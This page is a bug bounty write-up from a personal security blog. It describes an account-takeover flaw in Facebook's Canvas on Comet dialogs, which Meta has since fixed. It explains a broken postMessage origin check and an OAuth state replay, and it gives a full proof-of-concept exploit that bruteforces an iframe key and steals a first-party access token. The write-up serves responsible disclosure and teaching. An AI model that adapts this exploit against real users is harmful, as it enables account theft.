<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This bug could allow a malicious actor to takeover Facebook/Meta accounts if the user decided to play a Canvas game. The new Canvas on Comet is using Compat to display dialogs( eg OAuth dialogs ) in separate iframes, the process of displaying a dialog is to first receive a message of the type of the dialog ( like oauth ) and then create an iframe hosting apps.facebook.com/compat, then that iframe would communicate with the parent window via cross window messaging and then try to setup a new communication channel by sending a new MessageChannel port ( CometCompatBroker handles that in the parent window )" />
<meta property="og:description" content="This bug could allow a malicious actor to takeover Facebook/Meta accounts if the user decided to play a Canvas game. The new Canvas on Comet is using Compat to display dialogs( eg OAuth dialogs ) in separate iframes, the process of displaying a dialog is to first receive a message of the type of the dialog ( like oauth ) and then create an iframe hosting apps.facebook.com/compat, then that iframe would communicate with the parent window via cross window messaging and then try to setup a new communication channel by sending a new MessageChannel port ( CometCompatBroker handles that in the parent window )" />
<link rel="canonical" href="http://localhost:4000/2023/01/29/account-takeover-in-canvas-apps-served-in-comet-due-to-failure-in-cross-window-message-origin-validation.html" />
<meta property="og:url" content="http://localhost:4000/2023/01/29/account-takeover-in-canvas-apps-served-in-comet-due-to-failure-in-cross-window-message-origin-validation.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-01-29T14:04:55+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2023-01-29T14:04:55+01:00","datePublished":"2023-01-29T14:04:55+01:00","description":"This bug could allow a malicious actor to takeover Facebook/Meta accounts if the user decided to play a Canvas game. The new Canvas on Comet is using Compat to display dialogs( eg OAuth dialogs ) in separate iframes, the process of displaying a dialog is to first receive a message of the type of the dialog ( like oauth ) and then create an iframe hosting apps.facebook.com/compat, then that iframe would communicate with the parent window via cross window messaging and then try to setup a new communication channel by sending a new MessageChannel port ( CometCompatBroker handles that in the parent window )","headline":"Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2023/01/29/account-takeover-in-canvas-apps-served-in-comet-due-to-failure-in-cross-window-message-origin-validation.html"},"url":"http://localhost:4000/2023/01/29/account-takeover-in-canvas-apps-served-in-comet-due-to-failure-in-cross-window-message-origin-validation.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2023-01-29T14:04:55+01:00" itemprop="datePublished">Jan 29, 2023
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">qw</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>This bug could allow a malicious actor to takeover Facebook/Meta accounts if the user decided to play a Canvas game.</p>

<p>The new <strong>Canvas on Comet</strong> is using <strong>Compat</strong> to display dialogs( eg OAuth dialogs ) in separate iframes, the process of displaying a dialog is to first receive a message of the type of the dialog ( like oauth ) and then create an iframe hosting <a href="https://apps.facebook.com/compat">apps.facebook.com/compat</a>, then that iframe would communicate with the parent window via cross window messaging and then try to setup a new communication channel by sending a new MessageChannel port ( <strong>CometCompatBroker</strong> handles that in the parent window )</p>

<p>Once the new channel is established, the parent window would send the dialog uri to the iframe ( like <strong><a href="https://apps.facebook.com/dialog/oauth?app_id=1774400339513387&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter%23is_canvas%3Dtrue%26origin%3D*&amp;display=async&amp;state=fa6a98360231ec&amp;client_id=1774400339513387&amp;is_comet_compat=true&amp;cquick=jsc_c_1p&amp;cquick_token=AQ4d9gLTLArx2JrntAk&amp;ctarget=https%3A%2F%2Fapps.facebook.com">https://apps.facebook.com/dialog/oauth?app_id=1774400339513387&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter%23is_canvas%3Dtrue%26origin%3D*&amp;display=async&amp;state=fa6a98360231ec&amp;client_id=1774400339513387&amp;is_comet_compat=true&amp;cquick=jsc_c_1p&amp;cquick_token=AQ4d9gLTLArx2JrntAk&amp;ctarget=https%3A%2F%2Fapps.facebook.com</a></strong> ) and then the iframe would make an async request and display the response which should be a dialog.<br />
The step of establishing a new communication channel by sharing a MessageChannel Port is crucial since there are no more checks done to messages coming through that MessageChannel and the source is considered trusted. Before using the new communication channel, multiple checks are done to the source or sender of the message ( containing the MessageChannel port ) , CometCompatBroker verifies the origin of the message:</p>

<p><strong>CometCompatBroker : setupMessageChannel function:</strong></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">d</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">getMessageEventString</span><span class="dl">"</span><span class="p">)(</span><span class="nx">a</span><span class="p">,</span> <span class="dl">"</span><span class="s2">compatAction</span><span class="dl">"</span><span class="p">)</span>
<span class="p">,</span> <span class="nx">e</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">getMessageEventString</span><span class="dl">"</span><span class="p">)(</span><span class="nx">a</span><span class="p">,</span> <span class="dl">"</span><span class="s2">iframeKey</span><span class="dl">"</span><span class="p">);</span>
<span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker5</span> <span class="o">&amp;&amp;</span> <span class="nf">i</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">origin</span><span class="p">)</span> <span class="o">||</span> <span class="nf">h</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">origin</span><span class="p">))</span> <span class="o">&amp;&amp;</span> <span class="nx">d</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">CompatSetup</span><span class="dl">"</span> <span class="o">&amp;&amp;</span> <span class="nx">e</span> <span class="o">===</span> <span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker2</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker1</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker1</span><span class="p">.</span><span class="nf">close</span><span class="p">(),</span>
<span class="nx">a</span><span class="p">.</span><span class="nx">ports</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nb">Array</span><span class="p">.</span><span class="nf">isArray</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">ports</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker1</span> <span class="o">=</span> <span class="nx">a</span><span class="p">.</span><span class="nx">ports</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span>
<span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker1</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">$CometCompatBroker6</span><span class="p">,</span>
<span class="nf">b</span><span class="p">()))</span>
</code></pre></div></div>

<p>The interesting verification part is: h(a.origin)) &amp;&amp; d === “CompatSetup” &amp;&amp; e === this.$CometCompatBroker2 . So it has two checks, it would verify if iframeKey matches “e” and if the origin is allowed by passing it to function “h”; the first verification could be bypassed by bruteforcing because iframeKey has a unique format js_c_XX where XX can be in the charset [a-z0-9].</p>

<p>function h has this code:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">ConstUriUtils</span><span class="dl">"</span><span class="p">).</span><span class="nf">getUri</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span>
<span class="k">if </span><span class="p">(</span><span class="nx">b</span> <span class="o">==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">FBLogger</span><span class="dl">"</span><span class="p">)(</span><span class="dl">"</span><span class="s2">comet_infra</span><span class="dl">"</span><span class="p">).</span><span class="nf">mustfix</span><span class="p">(</span><span class="dl">"</span><span class="s2">Failed to parse the origin `%s`</span><span class="dl">"</span><span class="p">,</span> <span class="nx">a</span><span class="p">);</span>
<span class="k">return</span> <span class="o">!</span><span class="mi">1</span>
<span class="p">}</span>
<span class="nx">a</span> <span class="o">=</span> <span class="p">[</span><span class="dl">"</span><span class="s2">apps</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">secure</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">www</span><span class="dl">"</span><span class="p">].</span><span class="nf">some</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">a</span> <span class="o">=</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">ConstUriUtils</span><span class="dl">"</span><span class="p">).</span><span class="nf">getUri</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">getCompatIframeOrigin</span><span class="dl">"</span><span class="p">)(</span><span class="nx">a</span><span class="p">));</span>
<span class="k">return</span> <span class="nx">a</span> <span class="o">==</span> <span class="kc">null</span> <span class="p">?</span> <span class="o">!</span><span class="mi">1</span> <span class="p">:</span> <span class="nx">b</span><span class="p">.</span><span class="nf">isSameOrigin</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span>
<span class="p">});</span>
<span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span>
<span class="k">return</span> <span class="o">!</span><span class="mi">0</span><span class="p">;</span>
<span class="nx">a</span> <span class="o">=</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">ConstUriUtils</span><span class="dl">"</span><span class="p">).</span><span class="nf">getUri</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">origin</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/facebook</span><span class="se">\.</span><span class="sr">com/i</span><span class="p">,</span> <span class="dl">"</span><span class="s2">messenger.com</span><span class="dl">"</span><span class="p">));</span>
<span class="k">return</span> <span class="nx">a</span> <span class="p">?</span> <span class="nx">b</span><span class="p">.</span><span class="nf">isSameOrigin</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">:</span> <span class="o">!</span><span class="mi">1</span>
</code></pre></div></div>

<p>Here it creates a new URI object in b, then try to verify the domain. The bypass would be to send the message from a sandboxed iframe which would have the origin set to “null” in that case, <strong>d(“ConstUriUtils”).getUri(a)</strong> would return an URI object where protocol, domain , port all equal to null. The check to see if the origin is allowed is done via b.isSameOrigin(a) ; that function has this code:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nf">getProtocol</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nf">getProtocol</span><span class="p">()</span> <span class="o">!==</span> <span class="nx">a</span><span class="p">.</span><span class="nf">getProtocol</span><span class="p">())</span>
<span class="k">return</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>
<span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nf">getDomain</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nf">getDomain</span><span class="p">()</span> <span class="o">!==</span> <span class="nx">a</span><span class="p">.</span><span class="nf">getDomain</span><span class="p">())</span>
<span class="k">return</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>
<span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nf">getPort</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="k">this</span><span class="p">.</span><span class="nf">getPort</span><span class="p">()</span> <span class="o">!==</span> <span class="nx">a</span><span class="p">.</span><span class="nf">getPort</span><span class="p">())</span>
<span class="k">return</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>
<span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">toString</span><span class="p">()</span> <span class="o">===</span> <span class="dl">""</span> <span class="o">||</span> <span class="nx">a</span><span class="p">.</span><span class="nf">toString</span><span class="p">()</span> <span class="o">===</span> <span class="dl">""</span> <span class="p">?</span> <span class="o">!</span><span class="mi">1</span> <span class="p">:</span> <span class="o">!</span><span class="mi">0</span>
</code></pre></div></div>

<p>Since b, as we mentioned, has protocol, domain and port undefined, all checks would pass and the final one (this.toString() ) would return “null” and not “”. <strong>The correct way to use this function is to check if the trusted domain isSameOrigin with the untrusted one : ( a.isSameOrigin(b) instead of b.isSameOrigin(a) )</strong> .</p>

<p>Now since the origin check was bypassed and the MessageChannel port sent is being used, we would send this message to the port , {compatAction:”request-loaddialog”} ; the parent window would send back the dialog-url mentioned before , ( check <strong>CometCompatModalUniversal.react</strong> , j.sendChildFrameParams({ compatAction: “loaddialog”, rel: a.params.rel, uri: a.params.uri }) modules for more details) .</p>

<p>The dialog url like <strong>**<a href="https://apps.facebook.com/dialog/oauth?app_id=1774400339513387&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter%23is_canvas%3Dtrue%26origin%3D*&amp;display=async&amp;state=fa6a98360231ec&amp;client_id=1774400339513387&amp;is_comet_compat=true&amp;cquick=jsc_c_1p&amp;cquick_token=AQ4d9gLTLArx2JrntAk&amp;ctarget=https%3A%2F%2Fapps.facebook.com">https://apps.facebook.com/dialog/oauth?app_id=1774400339513387&amp;redirect_uri=https://www.facebook.com/dialog/return/arbiter%23is_canvas%3Dtrue%26origin%3D*&amp;display=async&amp;state=fa6a98360231ec&amp;client_id=1774400339513387&amp;is_comet_compat=true&amp;cquick=jsc_c_1p&amp;cquick_token=AQ4d9gLTLArx2JrntAk&amp;ctarget=https%3A%2F%2Fapps.facebook.com</a></strong>** would leak the cquick_token and the state. Now comes the best part! :</p>

<p>The <strong>state</strong> parameter actually represent the name of the callback function which would receive the Arbiter(“platform/dialog/response”) message containing the access_token/code and pass it to the source window that asked for the access_token/code:</p>

<p><strong>PlatformDialogClient.async:</strong></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kd">function</span> <span class="nf">o</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">d</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="kd">var</span> <span class="nx">f</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">state</span><span class="p">;</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">state</span> <span class="o">=</span> <span class="nx">d</span><span class="p">;</span>
        <span class="kd">var</span> <span class="nx">g</span> <span class="o">=</span> <span class="p">{</span>
            <span class="na">origin</span><span class="p">:</span> <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span>
        <span class="p">};</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">is_canvas</span> <span class="o">===</span> <span class="o">!</span><span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">g</span><span class="p">.</span><span class="nx">is_canvas</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">true</span><span class="dl">"</span><span class="p">,</span>
        <span class="k">delete</span> <span class="nx">b</span><span class="p">.</span><span class="nx">is_canvas</span><span class="p">);</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span> <span class="o">=</span> <span class="k">new </span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/dialog/return/arbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">setSubdomain</span><span class="p">(</span><span class="dl">"</span><span class="s2">www</span><span class="dl">"</span><span class="p">).</span><span class="nf">setFragment</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">QueryString</span><span class="dl">"</span><span class="p">).</span><span class="nf">encode</span><span class="p">(</span><span class="nx">g</span><span class="p">)).</span><span class="nf">getQualifiedURI</span><span class="p">().</span><span class="nf">toString</span><span class="p">();</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">display</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">;</span>
        <span class="nx">j</span><span class="p">[</span><span class="nx">d</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
            <span class="na">callback</span><span class="p">:</span> <span class="nx">e</span> <span class="o">||</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{}</span>
            <span class="p">,</span>
            <span class="na">state</span><span class="p">:</span> <span class="nx">f</span>
        <span class="p">};</span>
        <span class="k">return</span> <span class="nf">p</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Notice here that j contains a set of callback functions, the name of the objects are set to “d” variable which is the the <strong>state</strong> in this case ( d was passed to function o and it was randomly generated )</p>

<p>The trick here is that the attacker would construct a new request to /dialog/oauth endpoint while requesting an access token for a first party application and redirect uri set to <a href="https://facebook.com/dialog/return/arbiter">facebook.com/dialog/return/arbiter</a> and set the state to the leaked one ( also we use the leaked cquick_token to manage to iframe the dialog/oauth endpoint since the page is normally have X-Frame-Options: Deny which would become SAMEORIGIN), in the dialog/oauth response, it would try to send the response to the parent window by calling a parent window function with the access_token/code and the state leaked.</p>

<p>The parent window once it has received the response, it would assume it’s from the request it has initiated which would enforce app_id/client_id ( the app_id of the game owned by the attacker ) however of course the response came from another source.</p>

<p>The iframe containing the request to get a first-party access_token would be like this:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">https</span><span class="p">:</span><span class="c1">//www.facebook.com/dialog/oauth?app_id=124024574287414&amp;redirect_uri=https%3A%2F%2Fwww.facebook.com/dialog/return/arbiter%3Fversion%3D46%26relation%3Dtop%23origin%3Dfb124024574287414://authorize&amp;ctarget=https%3A%2F%2Fapps.facebook.com&amp;cquick=1&amp;response_type=token&amp;cquick_token=STOKEN_TOKEN&amp;state=STOLEN_STATE</span>
</code></pre></div></div>

<p>The response would be something like this:</p>

<pre><code class="language-markup">&lt;script nonce="5xD0Fobl"&gt;
    (function _(a, b, c, d, e) {
        a = window[a];
        if (a)
            if (window.location.protocol == b)
                a.closed || a.require("Arbiter").inform("platform/dialog/response", d);
            else if (a.postMessage) {
                if (!b.match(/^https?:$/) || !c.match(/\.facebook\.(com|sg)$/) || !c.match(/\.facebookcorewwwi\.(?:test)?onion$/))
                    throw new Error("Invalid Origin: " + b + "//" + c);
                a.postMessage("FB_DIALOG_RESPONSE:" + JSON.stringify(d), b + "//" + c)
            }
        e &amp;&amp; window.close();
        e &amp;&amp; !window.closed &amp;&amp; window.closeURI &amp;&amp; window.location.replace(window.closeURI)
    }
    )("top", "https:", "apps.facebook.com", {
        "access_token": "FIRST_PART_ACCESS_TOKEN",
        "data_access_expiration_time": 0,
        "expires_in": 0
    }, false);
&lt;/script&gt;

</code></pre>

<p>We notice a.require(“Arbiter”).inform(“platform/dialog/response”, d) with “a” being the top/parent window; since both windows are same-origin this is allowed. In the parent window we have this code:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">Arbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">subscribe</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformDialog</span><span class="dl">"</span><span class="p">).</span><span class="nx">RESPONSE</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">a</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">state</span><span class="p">;</span>
        <span class="nx">j</span><span class="p">[</span><span class="nx">a</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">j</span><span class="p">[</span><span class="nx">a</span><span class="p">].</span><span class="nf">callback</span><span class="p">(</span><span class="nx">b</span><span class="p">),</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">state</span> <span class="o">=</span> <span class="nx">j</span><span class="p">[</span><span class="nx">a</span><span class="p">].</span><span class="nx">state</span><span class="p">,</span>
        <span class="k">delete</span> <span class="nx">j</span><span class="p">[</span><span class="nx">a</span><span class="p">])</span>
    <span class="p">},</span> <span class="dl">"</span><span class="s2">new</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>

<p>Once (“Arbiter”).inform is used, this subscribed function would be executed, which would verify if the state (obj key) is valid and in that case call the callback function while passing the response containing the access_token as an argument. The callback function simply send a cross-window-message with postMessage to the window that made the request ( the iframe allegedly containing our game in Facebook Canvas ) and thus leaking a first-party token or code which can be used to access the Meta account and all other accounts like Facebook, Instagram.</p>

<p><strong>Proof of concept code</strong></p>

<pre><code class="language-markup">/
&lt;html&gt;
    &lt;script&gt;
        brutelist = []
        channels = []
        charset = ["0","1","2","3","4","5","6","7","8","9"];
        for(let x=0;x&lt;26;x++){
            charset.push(String.fromCharCode(x+97))
        }
        for(let x=0;x&lt;charset.length;x++){
            for(let i=0;i&lt;charset.length;i++){
            brutelist.push(charset[x]+charset[i]);
        }
        }
        // Extract state and cquick_token then 
        function message_receiver(message) {
            uri = new URL("https://ysamm.com" + message.data.uri);
            token = uri.searchParams.get("cquick_token");
            state = uri.searchParams.get("state");
            final_url = "https://apps.facebook.com/dialog/oauth?app_id=124024574287414&amp;redirect_uri=https%3A%2F%2Fwww.facebook.com/dialog/return/arbiter%3Fversion%3D46%26relation%3Dtop%23origin%3Dfb124024574287414://authorize&amp;ctarget=https%3A%2F%2Fapps.facebook.com&amp;cquick=1&amp;response_type=token&amp;cquick_token=" + token + "&amp;state=" + state;
           window.location.href = final_url;
        }
        
        function brute_ifrm_name(){
            i=0;
            intv = setInterval(()=&gt; {
                if (i&gt;brutelist.length) clearInterval(intv);
                i++;
                x = new MessageChannel(); 
                // Bruteforce the iframeKey
                ifrm_name = "jsc_c_" + brutelist[i];
                parent.postMessage({compatAction:"CompatSetup",iframeKey:ifrm_name},"*",[x.port1]);
                // Setup the function that receives the message.
                x.port2.onmessage = message_receiver;
                // Get the dialog URL with cquick_token and state
                setTimeout(()=&gt;{x.port2.postMessage({compatAction:"request-loaddialog"});},10);
            
            },20);
        }
        function oauth_send() {
            // This window would receive the response with access_token finally since we're redirecting in this window to the dialog/oauth url. 
            window.open("stage2.html","", "width=200,height=100");
            setTimeout(()=&gt;{
                brute_ifrm_name();
            },2000);
        }
        
        oauth_send()

    &lt;/script&gt;
&lt;/html&gt;
</code></pre>

<p>stage2.html</p>

<pre><code class="language-markup">
&lt;html&gt;
&lt;script&gt;
onmessage= (e)=&gt;{
            alert("We got the token:" + e.data)
}
        opener.parent.postMessage({"xdArbiterHandleMessage":true,"message":"FB_RPC:{\"jsonrpc\":\"2.0\",\"method\":\"showDialog\",\"id\":1,\"params\":[{\"method\":\"permissions.oauth\",\"redirect_uri\":\"https://ysamm.com\",\"is_canvas\":true}]}","origin":["*"]},"*");

&lt;/script&gt;
&lt;/html&gt;
</code></pre>

<p><strong>Timeline</strong></p>

<p>Nov 22, 2022— Report Sent <br />
Nov 22, 2022— Acknowledged by Meta<br />
Dec 12, 2022— Fixed by Meta<br />
Dec 27, 2022 — $62500 bounty awarded by Meta. ( Including bonuses )</p>


  </div><a class="u-url" href="/2023/01/29/account-takeover-in-canvas-apps-served-in-comet-due-to-failure-in-cross-window-message-origin-validation.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
